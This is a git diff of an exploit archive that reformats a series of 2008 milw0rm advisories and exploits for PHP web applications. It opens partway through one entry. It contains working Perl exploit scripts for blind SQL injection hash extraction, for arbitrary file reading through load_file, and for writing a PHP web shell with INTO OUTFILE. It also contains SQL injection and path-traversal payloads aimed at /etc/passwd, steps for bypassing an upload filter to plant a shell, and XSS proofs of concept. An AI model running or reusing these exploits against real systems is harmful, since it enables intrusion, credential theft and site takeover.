Go at: /[path]/login.php?ls_register + 2) In User form put a js code. (ex: ) + 3) Field the other forms, and press register button. 
+ +#################################################################################################################### +[0x03] Bug: [Database Disclosure] +###### + +Bugged file is: /[path]/login.php + +[CODE] + + if (empty($errors)) { + $newline = $records++; + $e_email = base64_encode($email); + $data = "$newline||$user||$e_email||$pass\n"; + $fh = fopen($users, 'a') or die("Can't open user database."); + fwrite($fh, $data); + fclose($fh); +?> + +[/CODE] + +This cms uses a flat database, a .txt file where it stores usernames,passwords and emails of the registered +users. + +[!] FIX: Don't use this kind of authentication :) + + +[!] EXPLOIT: /[path]/users.txt + + Informations are printed in this way: + 0||admin||b3NpcnlzQGxpdmUuaXQ=||6e1459df459890dfd8b4c3687c18abba + 1||cazzone||bG9sQGxvbC5pdA==||b7dba5a1bc3605a87b59ac8147512c97 + + user_number||username||email(base64 encrypted)||password(md5 encrypted) + +#################################################################################################################### + +[/END] + +# milw0rm.com [2008-12-19] diff --git a/platforms/php/webapps/7527.txt b/platforms/php/webapps/7527.txt index 2419f03fc..821f354e6 100755 --- a/platforms/php/webapps/7527.txt +++ b/platforms/php/webapps/7527.txt 
@@ -1,30 +1,30 @@ -################## Piker ####################################### -# -# -# FreeLyrics Remote Source Code Disclosure Vulnerability -# - -# -# Affected software: FreeLyrics -# Vendor: http://lyrics.sourceforge.net/ -# Risk: Medium -# -################################################################ - -# -# http://[target]/[path]/source.php?p=[FILE] -# -# PoC: http://[target]/[path]/source.php?p=config.php -# -# -################################################################ -# -# Found by Piker [piker0x90(at)gmail(dot)com] - -# D.O.M Labs - Security Researchers -# www.domlabs.org -# -# -################################################################ - -# milw0rm.com [2008-12-19] +################## Piker ####################################### +# +# +# FreeLyrics Remote Source Code Disclosure Vulnerability +# + +# +# Affected software: FreeLyrics +# Vendor: http://lyrics.sourceforge.net/ +# Risk: Medium +# +################################################################ + +# +# http://[target]/[path]/source.php?p=[FILE] +# +# PoC: http://[target]/[path]/source.php?p=config.php +# +# +################################################################ +# +# Found by Piker [piker0x90(at)gmail(dot)com] + +# D.O.M Labs - Security Researchers +# www.domlabs.org +# +# +################################################################ + +# milw0rm.com [2008-12-19] diff --git a/platforms/php/webapps/7529.txt b/platforms/php/webapps/7529.txt index e7e91b0c8..a33d9066f 100755 --- a/platforms/php/webapps/7529.txt +++ b/platforms/php/webapps/7529.txt 
@@ -1,32 +1,32 @@ -Constructr CMS -http://constructr-cms.org/ - -- <= 3.02.5 "Stable" - - -magic_quotes_gpc = Off -register_globals = On - -- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc - -http://site/constructr/backend/template.php?edit_file= - -Db info: -../config/config.inc.php - - -- SQL - -http://site/constructr/?show_page= - -User (urlencode) : --0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML -"Hash" is the password, not really encrypted... - - -- Timeline - -Author notified: Dec 12 -Public Disclosure: Dec 19 - - -- Seasons Greetings - -- http://nukeit.org - - -# milw0rm.com [2008-12-19] +Constructr CMS +http://constructr-cms.org/ + +- <= 3.02.5 "Stable" - + +magic_quotes_gpc = Off +register_globals = On + +- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc - +http://site/constructr/backend/template.php?edit_file= + +Db info: +../config/config.inc.php + + +- SQL - +http://site/constructr/?show_page= + +User (urlencode) : +-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML +"Hash" is the password, not really encrypted... + + +- Timeline - +Author notified: Dec 12 +Public Disclosure: Dec 19 + + +- Seasons Greetings - +- http://nukeit.org - + +# milw0rm.com [2008-12-19] diff --git a/platforms/php/webapps/7530.pl b/platforms/php/webapps/7530.pl index fde85bd07..5a5090aff 100755 --- a/platforms/php/webapps/7530.pl +++ b/platforms/php/webapps/7530.pl 
@@ -1,86 +1,86 @@ -#!/usr/bin/perl -w - -use strict; -use LWP::Simple; - -$| = 1; -p -print q { - -::::::::::::::::::::::::::::: -:: Userlocator 3.0 Exploit :: -:: written by katharsis :: -::::::::::::::::::::::::::::: - -[~] www.katharsis.x2.to -[~] nebelfrost23@web.de - -}; - -if (@ARGV < 2) { - print "Usage: usrlocsploit.pl [url] [user id]\nExample: usrlocsploit.pl www.target.com 1\n"; - exit; -} - -my $page = shift; -my $uid = shift; - -my $prefix; - -my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0'); - -print "[x] Vulnerability check...\n"; - -my $chreq = get("http://".$page."/locator.php?action=get_user&y='"); - -if (($chreq =~ m/Database error/i) || ($chreq =~ m/Invalid SQL/i)) { - -print "[x] Seems to be vulnerable!\n"; - -} else { - -print "[o] Seems to be patched, sorry\n"; -exit; - -} - -print "[^] Prefix check...\n"; - -if ($chreq =~ m/(..._)wlw/i) { - - print "[^] Success, using Prefix '$1'\n"; - $prefix = $1; - -} else { - print "[o] Can't find prefix, using 'bb1_'\n"; - $prefix = "bb1"; -} - -print "[+] Getting hash...\n"; -print "[+] Hash: "; - -my $curnum = 1; - -while($curnum < 32) { - -my $false_result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=-1/*"); - -foreach(@charset) { - - my $ascode = ord($_); - my $result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=".$ascode."/*"); - - if (length($result) != 0) { - if (length($result) != length($false_result)) { - print chr($ascode); - $curnum++; - } - } - } -} - -print "\n[+] Done!\n"; - -# EOF - -# milw0rm.com [2008-12-21] +#!/usr/bin/perl -w + +use strict; +use LWP::Simple; + +$| = 1; +p +print q { + +::::::::::::::::::::::::::::: +:: Userlocator 3.0 Exploit :: +:: written by katharsis :: +::::::::::::::::::::::::::::: + +[~] 
www.katharsis.x2.to +[~] nebelfrost23@web.de + +}; + +if (@ARGV < 2) { + print "Usage: usrlocsploit.pl [url] [user id]\nExample: usrlocsploit.pl www.target.com 1\n"; + exit; +} + +my $page = shift; +my $uid = shift; + +my $prefix; + +my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0'); + +print "[x] Vulnerability check...\n"; + +my $chreq = get("http://".$page."/locator.php?action=get_user&y='"); + +if (($chreq =~ m/Database error/i) || ($chreq =~ m/Invalid SQL/i)) { + +print "[x] Seems to be vulnerable!\n"; + +} else { + +print "[o] Seems to be patched, sorry\n"; +exit; + +} + +print "[^] Prefix check...\n"; + +if ($chreq =~ m/(..._)wlw/i) { + + print "[^] Success, using Prefix '$1'\n"; + $prefix = $1; + +} else { + print "[o] Can't find prefix, using 'bb1_'\n"; + $prefix = "bb1"; +} + +print "[+] Getting hash...\n"; +print "[+] Hash: "; + +my $curnum = 1; + +while($curnum < 32) { + +my $false_result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=-1/*"); + +foreach(@charset) { + + my $ascode = ord($_); + my $result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=".$ascode."/*"); + + if (length($result) != 0) { + if (length($result) != length($false_result)) { + print chr($ascode); + $curnum++; + } + } + } +} + +print "\n[+] Done!\n"; + +# EOF + +# milw0rm.com [2008-12-21] diff --git a/platforms/php/webapps/7531.txt b/platforms/php/webapps/7531.txt index 7dc860907..9ba2dea2a 100755 --- a/platforms/php/webapps/7531.txt +++ b/platforms/php/webapps/7531.txt 
@@ -1,26 +1,26 @@ -######################################################### ---------------------------------------------------------- -Portal Name: ReVou Twitter Clone Arbitrary File Upload Vulnerability -Version: All version -Vendor : http://www.revou.com/ -Demo: http://www.revou.com/demo/ -Author : S.W.A.T. , svvateam@yahoo.com -Vulnerability : wWw.BaTLaGH.CoM ---------------------------------------------------------- -######################################################### -[Mime Check Bypass]: -Create A File Called name.php And Fill It As Below: ----------- -GIF89aP; -[php_shell_code] ----------- -Save This File ! ----------- -Go To "My photo" (link: http://www.revou.com/demo/settings/my_photo) - -Select Your Shell & Upload ! ----------- -Done ! :-) ---------------------------------- - -# milw0rm.com [2008-12-21] +######################################################### +--------------------------------------------------------- +Portal Name: ReVou Twitter Clone Arbitrary File Upload Vulnerability +Version: All version +Vendor : http://www.revou.com/ +Demo: http://www.revou.com/demo/ +Author : S.W.A.T. , svvateam@yahoo.com +Vulnerability : wWw.BaTLaGH.CoM +--------------------------------------------------------- +######################################################### +[Mime Check Bypass]: +Create A File Called name.php And Fill It As Below: +---------- +GIF89aP; +[php_shell_code] +---------- +Save This File ! +---------- +Go To "My photo" (link: http://www.revou.com/demo/settings/my_photo) + +Select Your Shell & Upload ! +---------- +Done ! :-) +--------------------------------- + +# milw0rm.com [2008-12-21] diff --git a/platforms/php/webapps/7532.txt b/platforms/php/webapps/7532.txt index a80fd8fb8..d7e537a98 100755 --- a/platforms/php/webapps/7532.txt +++ b/platforms/php/webapps/7532.txt 
@@ -1,55 +1,55 @@ -########################## www.BugReport.ir ######################### -# -# AmnPardaz Security Research Team -# -# Title: chicomas <=2.0.4 Multiple Vulnerabilities -# Vendor: http://www.chicomas.com/ -# Demo: http://demo.opensourcecms.com/chicomas -# Bug: Database Information Disclosure, Authorization Weakness, XSS -# Vulnerable Version: 2.0.4 -# Exploitation: Remote with browser -# Fix: N/A -# Original Advisory: http://www.bugreport.ir/index_59.htm -################################################################### - - -#################### -- Description: -#################### - - ChiCoMaS is free web based Content Management System based on PHP & MySQL with Full featured WYSIWYG TinyMCE editor, -File management with QuiXplorer, User and group administration to manage access permissions & Backup/Restore with integrated MySqlBackupPro. - -#################### -- Vulnerability: -#################### - -+-->Dtabase Information Disclosure - -POC: http://[URL]/chicomas/config.inc - - -+-->The Latest generated Database backups - -POC: http://[URL]/chicomas/backup - - -+-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q" parameter. - -POC: http://[URL]/chicomas/index.php?q=" - -#################### -- Solution: -#################### - -Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized. 
- -#################### -- Credit : -#################### -AmnPardaz Security Research & Penetration Testing Group -Contact: admin[4t}bugreport{d0t]ir -www.BugReport.ir -www.AmnPardaz.com - -# milw0rm.com [2008-12-21] +########################## www.BugReport.ir ######################### +# +# AmnPardaz Security Research Team +# +# Title: chicomas <=2.0.4 Multiple Vulnerabilities +# Vendor: http://www.chicomas.com/ +# Demo: http://demo.opensourcecms.com/chicomas +# Bug: Database Information Disclosure, Authorization Weakness, XSS +# Vulnerable Version: 2.0.4 +# Exploitation: Remote with browser +# Fix: N/A +# Original Advisory: http://www.bugreport.ir/index_59.htm +################################################################### + + +#################### +- Description: +#################### + + ChiCoMaS is free web based Content Management System based on PHP & MySQL with Full featured WYSIWYG TinyMCE editor, +File management with QuiXplorer, User and group administration to manage access permissions & Backup/Restore with integrated MySqlBackupPro. + +#################### +- Vulnerability: +#################### + ++-->Dtabase Information Disclosure + +POC: http://[URL]/chicomas/config.inc + + ++-->The Latest generated Database backups + +POC: http://[URL]/chicomas/backup + + ++-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q" parameter. + +POC: http://[URL]/chicomas/index.php?q=" + +#################### +- Solution: +#################### + +Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized. + +#################### +- Credit : +#################### +AmnPardaz Security Research & Penetration Testing Group +Contact: admin[4t}bugreport{d0t]ir +www.BugReport.ir +www.AmnPardaz.com + +# milw0rm.com [2008-12-21] diff --git a/platforms/php/webapps/7537.txt b/platforms/php/webapps/7537.txt index 1122751f9..d2fe0074f 100755 --- a/platforms/php/webapps/7537.txt 
+++ b/platforms/php/webapps/7537.txt @@ -1,36 +1,36 @@ -################## Piker ####################################### -# -# -# BLOG v1.55B Arbitrary File Upload Vulnerability -# - -# -# Affected software: BLOG v1.55B prior versions can be affected - -# Vendor: http://sourceforge.net/projects/kafooeyblog/ -# Risk: High -# -################################################################ - -# - -# http://[target]/[path]/lib/image_upload.php -# -# This script only checks if the file you are uploading -# is not a text/plain file so you can upload whatever -# you want, for example a PHP Shell. -# - -# -################################################################ -# -# Found by Piker [piker0x90(at)gmail(dot)com] -# -# D.O.M Labs - Security Researchers -# www.domlabs.org - -# -# -################################################################ - -# milw0rm.com [2008-12-21] +################## Piker ####################################### +# +# +# BLOG v1.55B Arbitrary File Upload Vulnerability +# + +# +# Affected software: BLOG v1.55B prior versions can be affected + +# Vendor: http://sourceforge.net/projects/kafooeyblog/ +# Risk: High +# +################################################################ + +# + +# http://[target]/[path]/lib/image_upload.php +# +# This script only checks if the file you are uploading +# is not a text/plain file so you can upload whatever +# you want, for example a PHP Shell. +# + +# +################################################################ +# +# Found by Piker [piker0x90(at)gmail(dot)com] +# +# D.O.M Labs - Security Researchers +# www.domlabs.org + +# +# +################################################################ + +# milw0rm.com [2008-12-21] diff --git a/platforms/php/webapps/7541.pl b/platforms/php/webapps/7541.pl index b7e80488d..d00115dcc 100755 --- a/platforms/php/webapps/7541.pl +++ b/platforms/php/webapps/7541.pl 
@@ -1,114 +1,114 @@ -#!/usr/bin/perl -################################ -## Coded by Piker [piker(dot)ther00t(at)gmail(dot)com] -## D.O.M Team -## piker,ka0x,an0de,xarnuz -## 2008 Security Researchers -################################ -## -## RSS Simple News Remote SQL Injection Exploit -## http://sourceforge.net/projects/rss-simple-news/ -## -## This exploit tries to read an -## arbitrary file. -## -## It needs magic_quotes_gpc=off -## -################################ - -# piker@domlabs:~/advisories$ perl rss.pl http://localhost/rss /etc/passwd -#[+] File HEX: 0x2f6574632f706173737764 -#[+] Host: http://localhost/rss/ -#[+] File content: -#daemon:x:1:1:daemon:/usr/sbin:/bin/sh -#bin:x:2:2:bin:/bin:/bin/sh -#sys:x:3:3:sys:/dev:/bin/sh -#sync:x:4:65534:sync:/bin:/bin/sync -#games:x:5:60:games:/usr/games:/bin/sh -# [...] -#[+] EOF -# -# - - -use LWP::UserAgent; - -open(FILE, ">&STDOUT"); - -my $host = $ARGV[0]; -my $file = $ARGV[1]; - -die &_USO unless $ARGV[1]; - -sub _USO -{ - die " - RSS Simple News Remote Sql Injection Exploit - - This exploit tries to read an - arbitrary file. 
- - It needs magic_quotes_gpc=off - - usage: ./$0 - ex: ./$0 http://localhost/rss/ /etc/passwd - - "; -} - -my $ua = LWP::UserAgent->new() or die; -$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); - -my $tmp="0x"; -my $tmp2; - -foreach my $c (split(//, $file)){ - $tmp2 = sprintf ("%x", ord($c)); - $tmp .= $tmp2; -} - -print FILE "[+] File HEX: ".$tmp."\n"; - -if ($host !~ /\/$/){ $host .= "/"; } - -print FILE "[+] Host: ".$host."\n"; - -my $req = HTTP::Request->new(GET => $host."news.php?pid=-1' union select 1,2,3,4,CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e),6 and 'a'='a"); -my $res = $ua->request($req); -my $con = $res->content; - -my $ok = 0; -open (OUT, ">result.txt"); - -if ($res->is_success){ - foreach my $linea (split(/\n/, $con)){ - if($ok == 1){ - if ($linea !~ //){ - print FILE $linea."\n"; - print OUT $linea."\n"; - }else{ - print FILE "\n[+] EOF\n"; - print "\n[+] File saved into 'result.txt'\n"; - goto salida; - } - } - if($linea =~ //i && $ok == 0){ - $ok = 1; - print FILE "[+] File content: \n"; - } - } - salida: - if ($ok == 0){ - print FILE "[-] Exploit Failed!\n"; - } -} -else{ - print FILE "[-] Exploit Failed!\n"; -} - -close(FILE); -close(OUT); - -#EOF - -# milw0rm.com [2008-12-22] +#!/usr/bin/perl +################################ +## Coded by Piker [piker(dot)ther00t(at)gmail(dot)com] +## D.O.M Team +## piker,ka0x,an0de,xarnuz +## 2008 Security Researchers +################################ +## +## RSS Simple News Remote SQL Injection Exploit +## http://sourceforge.net/projects/rss-simple-news/ +## +## This exploit tries to read an +## arbitrary file. 
+## +## It needs magic_quotes_gpc=off +## +################################ + +# piker@domlabs:~/advisories$ perl rss.pl http://localhost/rss /etc/passwd +#[+] File HEX: 0x2f6574632f706173737764 +#[+] Host: http://localhost/rss/ +#[+] File content: +#daemon:x:1:1:daemon:/usr/sbin:/bin/sh +#bin:x:2:2:bin:/bin:/bin/sh +#sys:x:3:3:sys:/dev:/bin/sh +#sync:x:4:65534:sync:/bin:/bin/sync +#games:x:5:60:games:/usr/games:/bin/sh +# [...] +#[+] EOF +# +# + + +use LWP::UserAgent; + +open(FILE, ">&STDOUT"); + +my $host = $ARGV[0]; +my $file = $ARGV[1]; + +die &_USO unless $ARGV[1]; + +sub _USO +{ + die " + RSS Simple News Remote Sql Injection Exploit + + This exploit tries to read an + arbitrary file. + + It needs magic_quotes_gpc=off + + usage: ./$0 + ex: ./$0 http://localhost/rss/ /etc/passwd + + "; +} + +my $ua = LWP::UserAgent->new() or die; +$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); + +my $tmp="0x"; +my $tmp2; + +foreach my $c (split(//, $file)){ + $tmp2 = sprintf ("%x", ord($c)); + $tmp .= $tmp2; +} + +print FILE "[+] File HEX: ".$tmp."\n"; + +if ($host !~ /\/$/){ $host .= "/"; } + +print FILE "[+] Host: ".$host."\n"; + +my $req = HTTP::Request->new(GET => $host."news.php?pid=-1' union select 1,2,3,4,CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e),6 and 'a'='a"); +my $res = $ua->request($req); +my $con = $res->content; + +my $ok = 0; +open (OUT, ">result.txt"); + +if ($res->is_success){ + foreach my $linea (split(/\n/, $con)){ + if($ok == 1){ + if ($linea !~ //){ + print FILE $linea."\n"; + print OUT $linea."\n"; + }else{ + print FILE "\n[+] EOF\n"; + print "\n[+] File saved into 'result.txt'\n"; + goto salida; + } + } + if($linea =~ //i && $ok == 0){ + $ok = 1; + print FILE "[+] File content: \n"; + } + } + salida: + if ($ok == 0){ + print FILE "[-] Exploit Failed!\n"; + } +} +else{ + print FILE "[-] Exploit Failed!\n"; +} + +close(FILE); +close(OUT); + +#EOF + +# milw0rm.com [2008-12-22] 
diff --git a/platforms/php/webapps/7542.txt b/platforms/php/webapps/7542.txt
index 90f1eb8e1..036c0716e 100755
--- a/platforms/php/webapps/7542.txt
+++ b/platforms/php/webapps/7542.txt
@@ -1,37 +1,37 @@ -############################################################################################# -[+] Text Lines Rearrange Script (download.php filename) File -Disclosure Vulnerability -[+] Discovered By SirGod -[+] Visit : www.h4cky0u.org -[+] Greetz : All my friends -############################################################################################# - - [+] File Disclosure Vulnerability - - Vulnerable Code in download.php : - ------------------------------------------------------ - -if(file_exists($filename)) -{ - $fp=fopen($filename,"r"); - $content=fread($fp,filesize($filename)); - fclose($fp); - ------------------------------------------------------- - - PoC : - - http://[target]/[path]/download.php?filename=[Local File] - - Example : - - http://[target]/[path]/download.php?filename=index.php - - Live Demo : - - http://www.rightscripts.com/listrearrange/download.php?filename=index.php - -############################################################################################# - -# milw0rm.com [2008-12-22] +############################################################################################# +[+] Text Lines Rearrange Script (download.php filename) File +Disclosure Vulnerability +[+] Discovered By SirGod +[+] Visit : www.h4cky0u.org +[+] Greetz : All my friends +############################################################################################# + + [+] File Disclosure Vulnerability + + Vulnerable Code in download.php : + +----------------------------------------------------- + +if(file_exists($filename)) +{ + $fp=fopen($filename,"r"); + $content=fread($fp,filesize($filename)); + fclose($fp); + +------------------------------------------------------ + + PoC : + + http://[target]/[path]/download.php?filename=[Local File] + + Example : + + http://[target]/[path]/download.php?filename=index.php + + Live Demo : + + http://www.rightscripts.com/listrearrange/download.php?filename=index.php + 
+############################################################################################# + +# milw0rm.com [2008-12-22] diff --git a/platforms/php/webapps/7543.txt b/platforms/php/webapps/7543.txt index 23b60b232..ad53bc140 100755 --- a/platforms/php/webapps/7543.txt +++ b/platforms/php/webapps/7543.txt @@ -1,19 +1,19 @@ - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| - -Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote File Disclosure Vulnerability -D : http://downloads.wordpress.org/plugin/page-flip-image-gallery.0.2.2.zip -Poc : - /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=../../../../../../../../../../../etc/passwd%00123 - - ____ _ _ __ __ - / ___| ___ | | __| | | \/ | - | | _ / _ \ | | / _` | | |\/| | - | |_| | | (_) | | |___ | (_| | | | | | - \____| \___/ |_____| \__,_| _____ |_| |_| - |_____| - -# milw0rm.com [2008-12-22] + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + +Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote File Disclosure Vulnerability +D : http://downloads.wordpress.org/plugin/page-flip-image-gallery.0.2.2.zip +Poc : + /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=../../../../../../../../../../../etc/passwd%00123 + + ____ _ _ __ __ + / ___| ___ | | __| | | \/ | + | | _ / _ \ | | / _` | | |\/| | + | |_| | | (_) | | |___ | (_| | | | | | + \____| \___/ |_____| \__,_| _____ |_| |_| + |_____| + +# milw0rm.com [2008-12-22] diff --git a/platforms/php/webapps/7544.txt b/platforms/php/webapps/7544.txt index baa36d428..16b7d5384 100755 --- a/platforms/php/webapps/7544.txt +++ b/platforms/php/webapps/7544.txt 
@@ -1,134 +1,134 @@ -#!/usr/bin/perl - -=about - - Pligg 9.9.5 Beta Perl exploit - - AUTHOR - discovered & written by Ams - ax330d [doggy] gmail [dot] com - - VULN. DESCRIPTION: - Vulnerability hides in 'evb/check_url.php' - unfiltered $_GET['url'] parameter. - Actually, it has filtration. - Filtration strips tags and converts html - special chars , but it is not enough, - because we can use MySQLs CHAR() function - to convert shell to allowed chars. - - EXPLOIT WORK: - Firtsly, exploit tryes to get full server - path, but if not succeeded, then it will brute it. - If path has been found then exploit will try - to upload tiny shell via SQl-Injection. - - REQUIREMENTS: - MySQL should be able to write to file. - Know full server path to portal. - magiq_quotes_gpc=off - -=cut - -use strict; -use warnings; -use LWP::UserAgent; -use HTTP::Request::Common; - -Banner(); - -$| = 1; -my $expl_url = shift or Usage(); -my $serv_path = shift || ''; - -my $spider = LWP::UserAgent->new; -$spider->timeout( 9 ); -$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); - -my $def_shell = '/libs/manager.php'; -my $shell = q(); -my $sql_shell = join ',', map { ord } split //, $shell; - -my @paths = qw( - /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts - /home/www /home/httpd/vhosts - /usr/local/apache/htdocs - /www/htdocs -); - -exploit( $expl_url ); - -sub exploit { - - $_ = shift; - print "\n\tExploiting: $_"; - - my ( $packet, $rcvd, $injection ); - my ( $prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?}; - - my $req = GET "$prot://$host$path/evb/check_url.php"; - my $res = $spider->request( $req ); - $serv_path = $res->content =~ /template\s+in\s+(.*?)config\.php/ - ? 
$1 - : $serv_path; - - if ( $serv_path ne '' ) { - - print "\n\tFound server path: $serv_path"; - - chomp( $serv_path ); - $injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$def_shell'-- "; - $req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection ); - $res = $spider->request( $req ); - - } else { - - print "\n\tUnable to find path, starting bruteforce...\n"; - - for $serv_path ( @paths ) { - - printf "\tTrying: $serv_path$path$def_shell %s\r", ' ' x 10; - - chomp( $serv_path ); - $injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$path$def_shell'-- "; - $req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection ); - $res = $spider->request( $req ); - } - } - - # Checking for shell presence - $req = HEAD "http://$host$path$def_shell"; - $res = $spider->request( $req ); - - if ( $res->status_line =~ /200/ ) { - print "\n\tExploited: http://$host$path$def_shell\n\n"; - } else { - print "\n\tExploiting failed\n\n"; - } - -} - -# Light wheel... -sub Url_Encode { - $_ = shift; - s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; - return $_; -} - -sub Usage { - print "\n\tUsage:\t$0 http://site.com [full server path] - - Example: - $0 http://localhost/ /var/www/htdocs - $0 http://localhost/\n\n"; - exit; -} - -sub Banner { - print " - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Pligg 9.9.5 Beta Perl exploit - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; -} - -# milw0rm.com [2008-12-22] +#!/usr/bin/perl + +=about + + Pligg 9.9.5 Beta Perl exploit + + AUTHOR + discovered & written by Ams + ax330d [doggy] gmail [dot] com + + VULN. DESCRIPTION: + Vulnerability hides in 'evb/check_url.php' + unfiltered $_GET['url'] parameter. + Actually, it has filtration. + Filtration strips tags and converts html + special chars , but it is not enough, + because we can use MySQLs CHAR() function + to convert shell to allowed chars. 
+ + EXPLOIT WORK: + Firtsly, exploit tryes to get full server + path, but if not succeeded, then it will brute it. + If path has been found then exploit will try + to upload tiny shell via SQl-Injection. + + REQUIREMENTS: + MySQL should be able to write to file. + Know full server path to portal. + magiq_quotes_gpc=off + +=cut + +use strict; +use warnings; +use LWP::UserAgent; +use HTTP::Request::Common; + +Banner(); + +$| = 1; +my $expl_url = shift or Usage(); +my $serv_path = shift || ''; + +my $spider = LWP::UserAgent->new; +$spider->timeout( 9 ); +$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); + +my $def_shell = '/libs/manager.php'; +my $shell = q(); +my $sql_shell = join ',', map { ord } split //, $shell; + +my @paths = qw( + /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts + /home/www /home/httpd/vhosts + /usr/local/apache/htdocs + /www/htdocs +); + +exploit( $expl_url ); + +sub exploit { + + $_ = shift; + print "\n\tExploiting: $_"; + + my ( $packet, $rcvd, $injection ); + my ( $prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?}; + + my $req = GET "$prot://$host$path/evb/check_url.php"; + my $res = $spider->request( $req ); + $serv_path = $res->content =~ /template\s+in\s+(.*?)config\.php/ + ? $1 + : $serv_path; + + if ( $serv_path ne '' ) { + + print "\n\tFound server path: $serv_path"; + + chomp( $serv_path ); + $injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$def_shell'-- "; + $req = GET "$prot://$host$path/evb/check_url.php?url=" . 
Url_Encode( $injection ); + $res = $spider->request( $req ); + + } else { + + print "\n\tUnable to find path, starting bruteforce...\n"; + + for $serv_path ( @paths ) { + + printf "\tTrying: $serv_path$path$def_shell %s\r", ' ' x 10; + + chomp( $serv_path ); + $injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$path$def_shell'-- "; + $req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection ); + $res = $spider->request( $req ); + } + } + + # Checking for shell presence + $req = HEAD "http://$host$path$def_shell"; + $res = $spider->request( $req ); + + if ( $res->status_line =~ /200/ ) { + print "\n\tExploited: http://$host$path$def_shell\n\n"; + } else { + print "\n\tExploiting failed\n\n"; + } + +} + +# Light wheel... +sub Url_Encode { + $_ = shift; + s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; + return $_; +} + +sub Usage { + print "\n\tUsage:\t$0 http://site.com [full server path] + + Example: + $0 http://localhost/ /var/www/htdocs + $0 http://localhost/\n\n"; + exit; +} + +sub Banner { + print " + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + Pligg 9.9.5 Beta Perl exploit + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; +} + +# milw0rm.com [2008-12-22] diff --git a/platforms/php/webapps/7545.txt b/platforms/php/webapps/7545.txt index 328f37a0c..155909b8e 100755 --- a/platforms/php/webapps/7545.txt +++ b/platforms/php/webapps/7545.txt 
